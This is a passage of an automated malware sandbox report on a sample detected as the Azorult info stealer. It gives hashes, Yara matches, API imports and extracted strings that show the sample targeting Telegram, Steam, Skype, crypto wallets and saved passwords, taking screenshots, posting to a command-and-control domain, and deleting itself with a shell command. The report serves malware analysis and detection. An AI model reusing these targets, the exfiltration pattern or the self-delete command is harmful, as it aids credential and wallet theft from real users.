2024-12-21 11:07:03 UTC	958	IN	HTTP/1.1 530 Date: Sat, 21 Dec 2024 11:07:03 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6roEGItuqWO7Gg%2BrsIoA9v%2B0tuwKtJ9h4h3Woh6DEIMfs7%2FjMFQP%2BpvgaD4ldclxhPY4DENJ5NS25IlM3Y57PhfEtxYbd9m6UB17oAQJvYSj1dGHWkHbQ3M%2FkERhgB%2BK4Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8f576803abae42ac-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1565&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=777&delivery_rate=1800246&cwnd=215&unsent_bytes=0&cid=ea6cbf0c48b39fd3&ts=451&x=0"
2024-12-21 11:07:03 UTC	16	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 33 33 Data Ascii: error code: 1033

Target ID:	0
Start time:	06:06:59
Start date:	21/12/2024
Path:	C:\Users\user\Desktop\Oggq2dY6kx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Oggq2dY6kx.exe"
Imagebase:	0x400000
File size:	114'688 bytes
MD5 hash:	E3E636DDED2B38EA6FC5710D467C29E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000000.1668122599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000000.1668122599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000000.1668122599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000000.1668122599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	10

Executed Functions

Function 00417B1A Relevance: 57.8, APIs: 20, Strings: 13, Instructions: 64
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 00417B33
GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417B39
LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B4D
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B53
LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B67
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B6D
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B81
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B87
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B9B
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BA1
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 00417BB5
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BBB
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 00417BCF
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BD5
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 00417BE9
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BEF
LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 00417C03
GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C09
LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417C1D
GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C23

Strings

GdipGetImageEncodersSize, xrefs: 00417B91
GdipGetImageEncoders, xrefs: 00417BAB
GdiplusShutdown, xrefs: 00417B5D
GdipCreateBitmapFromHBITMAP, xrefs: 00417B77
CreateStreamOnHGlobal, xrefs: 00417BF9
GdiplusStartup, xrefs: 00417B43
wcscmp, xrefs: 00417B29
GdipDisposeImage, xrefs: 00417BC5
crtdll.dll, xrefs: 00417B2E
GdipSaveImageToStream, xrefs: 00417BDF
Gdiplus.dll, xrefs: 00417B48, 00417B62, 00417B7C, 00417B96, 00417BB0, 00417BCA, 00417BE4
GetHGlobalFromStream, xrefs: 00417C13
ole32.dll, xrefs: 00417BFE, 00417C18

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
API String ID: 2574300362-2815069134
Opcode ID: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
Instruction ID: 8590a6e993e3993f4c60c6cfae4e59332f73d92cf5cac50a27a19d2551d8218b
Opcode Fuzzy Hash: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
Instruction Fuzzy Hash: 3911D0F17C430069DA0177B2DD8BAE635B4BBC1B4A730447B7104722D2E97C888196DD

Function 004065CC Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
Instruction ID: 82fb6e080fc5b909ee9ff94d6b2e2f71dc3c30d6621c9439b15b03eb027989ab
Opcode Fuzzy Hash: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
Instruction Fuzzy Hash: 10E086712042025BD310EB58DC81A9A76D89B84315F00483EBC45D73D2EE3DDE589756

Function 0040561C Relevance: 220.8, APIs: 63, Strings: 63, Instructions: 312
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00419155), ref: 0040562D
GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 0040563C
GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040564E
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 00405660
GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00405672
GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 00405684
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00405696
GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056A8
GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 004056BA
GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 004056CC
GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 004056DE
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 004056F0
GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 00405702
GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405714
GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 00405726
GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405738
GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 0040574A
GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 0040575C
GetProcAddress.KERNEL32(00000000,LocalFree), ref: 0040576E
GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 00405780
GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 00405792
GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057A4
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057B6
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004057C8
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004057DA
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004057EC
GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 004057FE
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00405810
GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 00405822
GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 00405834
GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405846
GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405858
GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040586A
GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 0040587C
GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 0040588E
GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058A0
LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058AF
GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058BE
GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 004058D0
GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 004058E2
GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 004058F4
GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405906
GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405918
GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 0040592A
GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 0040593C
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040594E
GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 00405960
GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 00405972
GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 00405984
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00405996
GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059A8
GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059BA
GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 004059CC
GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 004059DE
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 004059F0
LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 004059FF
GetProcAddress.KERNEL32(75BD0000,EnumDisplayDevicesW), ref: 00405A14
GetProcAddress.KERNEL32(75BD0000,wvsprintfA), ref: 00405A29
GetProcAddress.KERNEL32(75BD0000,GetKeyboardLayoutList), ref: 00405A3E
LoadLibraryA.KERNEL32(shell32.dll,75BD0000,GetKeyboardLayoutList,75BD0000,wvsprintfA,75BD0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A4D
GetProcAddress.KERNEL32(75DA0000,ShellExecuteExW), ref: 00405A62
LoadLibraryA.KERNEL32(ntdll.dll,75DA0000,ShellExecuteExW,shell32.dll,75BD0000,GetKeyboardLayoutList,75BD0000,wvsprintfA,75BD0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405A71
GetProcAddress.KERNEL32(76E90000,RtlComputeCrc32), ref: 00405A86

Strings

Process32FirstW, xrefs: 004057D2
ntdll.dll, xrefs: 00405A6C
RegOpenKeyExW, xrefs: 004058FE
CreateProcessAsUserW, xrefs: 00405934
RegEnumKeyW, xrefs: 0040596A
GetLastError, xrefs: 004056E8
GetDriveTypeA, xrefs: 00405886
RegCloseKey, xrefs: 004058EC
GetUserNameW, xrefs: 004058B6
CloseHandle, xrefs: 0040568E
CreateFileW, xrefs: 0040566A
GetCurrentDirectoryW, xrefs: 004056FA
SetEnvironmentVariableW, xrefs: 0040570C
AllocateAndInitializeSid, xrefs: 00405910
GetFileAttributesW, xrefs: 004056B2
GetEnvironmentVariableW, xrefs: 0040571E
FindFirstFileW, xrefs: 00405742
CheckTokenMembership, xrefs: 00405946
CreateProcessW, xrefs: 00405898
CryptCreateHash, xrefs: 004059A0
LocalFree, xrefs: 00405766
FindNextFileW, xrefs: 00405754
kernel32.dll, xrefs: 00405628
RegCreateKeyExW, xrefs: 004058C8
GlobalMemoryStatusEx, xrefs: 004057AE
GetTimeZoneInformation, xrefs: 0040583E
wvsprintfA, xrefs: 00405A1E
FindClose, xrefs: 0040579C
GetModuleFileNameW, xrefs: 004057F6
CryptHashData, xrefs: 004059B2
GlobalMemoryStatus, xrefs: 00405658
GetFileSize, xrefs: 0040567C
SetCurrentDirectoryW, xrefs: 00405730
shell32.dll, xrefs: 00405A48
LookupAccountSidA, xrefs: 00405922
ExpandEnvironmentStringsW, xrefs: 00405634
GetTickCount, xrefs: 00405778
GetLocalTime, xrefs: 0040582C
EnumDisplayDevicesW, xrefs: 00405A09
RegQueryValueExW, xrefs: 004058DA
RegEnumValueW, xrefs: 0040597C
CreateToolhelp32Snapshot, xrefs: 004057C0
Process32NextW, xrefs: 004057E4
CryptAcquireContextA, xrefs: 0040598E
GetLocaleInfoA, xrefs: 0040581A
RtlComputeCrc32, xrefs: 00405A7B
ShellExecuteExW, xrefs: 00405A57
RegOpenKeyW, xrefs: 00405958
RemoveDirectoryW, xrefs: 00405850
SetDllDirectoryW, xrefs: 00405808
user32.dll, xrefs: 004059FA
CreateMutexA, xrefs: 004056C4
CryptDestroyHash, xrefs: 004059D6
GetLogicalDriveStringsA, xrefs: 00405874
GetKeyboardLayoutList, xrefs: 00405A33
advapi32.dll, xrefs: 004058AA
CryptReleaseContext, xrefs: 004059E8
ReleaseMutex, xrefs: 004056D6
CopyFileW, xrefs: 0040578A
DeleteFileW, xrefs: 00405862
CryptGetHashParam, xrefs: 004059C4
ReadFile, xrefs: 004056A0
GetComputerNameW, xrefs: 00405646

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetEnvironmentVariableW$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
API String ID: 2238633743-617434850
Opcode ID: ed6a8e92284a318c94f0322e28525f172068a9e89f8e16d42c814494dd58fb50
Instruction ID: cfd24dbd3a5623e96a1366eeff91a6eabf16f5ed4c2f56b33555d19b2fe062a0
Opcode Fuzzy Hash: ed6a8e92284a318c94f0322e28525f172068a9e89f8e16d42c814494dd58fb50
Instruction Fuzzy Hash: AEC174B1A80710ABDB01EFA5DC8AA6A37A8FB45705360953BB544FF2D1D678DC018F9C

Function 00419108 Relevance: 57.0, APIs: 4, Strings: 28, Instructions: 964
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00419195

Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435

GetSystemMetrics.USER32(00000001), ref: 00419460
GetSystemMetrics.USER32(00000000), ref: 00419468
ExitProcess.KERNEL32(00000000), ref: 00419F2B

Strings

http://ip-api.com/json, xrefs: 0041988E
<, xrefs: 00419E1B
<n>, xrefs: 004192A8
%appdata%\Telegram Desktop\tdata\, xrefs: 00419425
ip.txt, xrefs: 004198E5, 004198F7
</d>, xrefs: 004192D7
<d>, xrefs: 004192DF
</c>, xrefs: 00419279
<c>, xrefs: 00419281
D877F783D5*,map*, xrefs: 00419420
"countryCode":", xrefs: 004198BA
GET, xrefs: 00419887
Files\, xrefs: 004196C6, 004197A1
%comspec%, xrefs: 00419E45
scr.jpg, xrefs: 00419475
0_@, xrefs: 00419CD7, 0041A0EA
</n>, xrefs: 004192A0
image/jpeg, xrefs: 00419455
Skype, xrefs: 004193F8
Steam, xrefs: 0041943B
exit, xrefs: 00419262
PasswordsList.txt, xrefs: 00419368
Telegram, xrefs: 0041941B
/c %WINDIR%\system32\timeout.exe 3 & del ", xrefs: 00419E66
System.txt, xrefs: 00419938
%DSK_, xrefs: 004194C5, 004194E2, 0041956B
"query":", xrefs: 004198A4
Coins, xrefs: 004193CE

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: Create$DirectoryMetricsSystem$ExitMutexProcess
String ID: "countryCode":"$"query":"$%DSK_$%appdata%\Telegram Desktop\tdata\$%comspec%$/c %WINDIR%\system32\timeout.exe 3 & del "$0_@$<$</c>$</d>$</n>$<c>$<d>$<n>$Coins$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$Telegram$exit$http://ip-api.com/json$image/jpeg$ip.txt$scr.jpg
API String ID: 447519224-805684967
Opcode ID: 393cdfa5e90172c38ce23b04994494a061c28785eddfdfed88361b285a484fb5
Instruction ID: 8e865d1d98f6c8efaf34d3e531d58462b667ba857a61b59ff422c1b99a10b1ba
Opcode Fuzzy Hash: 393cdfa5e90172c38ce23b04994494a061c28785eddfdfed88361b285a484fb5
Instruction Fuzzy Hash: 4F920E34A0011D9FDB11EB55C885BCDB7B9AF49308F5081BBE408B7292DB38AF958F59

Function 00418688 Relevance: 42.4, APIs: 18, Strings: 6, Instructions: 375
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418714
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418728
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418748
GetProcAddress.KERNEL32(00000000,-0000000C), ref: 0041875C
GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00418771
GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00418786
GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041879B
GetProcAddress.KERNEL32(00000000,-00000053), ref: 004187B0
GetProcAddress.KERNEL32(00000000,-00000064), ref: 004187C5
GetProcAddress.KERNEL32(00000000,-00000075), ref: 004187DA
GetProcAddress.KERNEL32(00000000,-00000089), ref: 004187F0
GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00418807
InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 004188F3
InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C), ref: 00418984
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 004189C4
HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 00418A21
HttpSendRequestA.WININET(00000000,00418CB8,00000000,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418A72
InternetCloseHandle.WININET(00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418AD4

Strings

.bit, xrefs: 00418928
POST, xrefs: 004186DD
wininet.dll, xrefs: 00418701
Host: , xrefs: 00418951
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), xrefs: 0041897F
inglesxyz.shop, xrefs: 00418989

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressProc$Internet$HandleHttpLibraryLoadOpenRequest$CloseConnectCrackModuleSend
String ID: .bit$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$inglesxyz.shop$wininet.dll
API String ID: 3386017226-1979561820
Opcode ID: 3985519fff23fc4608e233669805ad7cdc689a9b9ac4a7c1542b5e4b96a76217
Instruction ID: 8c20cc009bbb13acc87624f3a171753233ac08310759435a2e91fadf7e7a38d5
Opcode Fuzzy Hash: 3985519fff23fc4608e233669805ad7cdc689a9b9ac4a7c1542b5e4b96a76217
Instruction Fuzzy Hash: 33E1EBB1910218ABDB10EFA5CC86BDEBBBCBF44305F10417AF504B7681DB78AA458B58

Function 0040955E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 00409573
GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 00409579

Strings

CryptUnprotectData, xrefs: 00409569
crypt32.dll, xrefs: 0040956E

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32.dll
API String ID: 2574300362-1827663648
Opcode ID: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
Instruction ID: 1936ed15528034ef1a8706b88be01f12f22861c51f7a066308f0a1848fab801f
Opcode Fuzzy Hash: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
Instruction Fuzzy Hash: 89C04CF368030376CF466B779D4A5462294B7C1B1D760493BF511B11D2D6BC8D404F5D

Function 00407C58 Relevance: 4.6, APIs: 3, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407D16), ref: 00407CD9
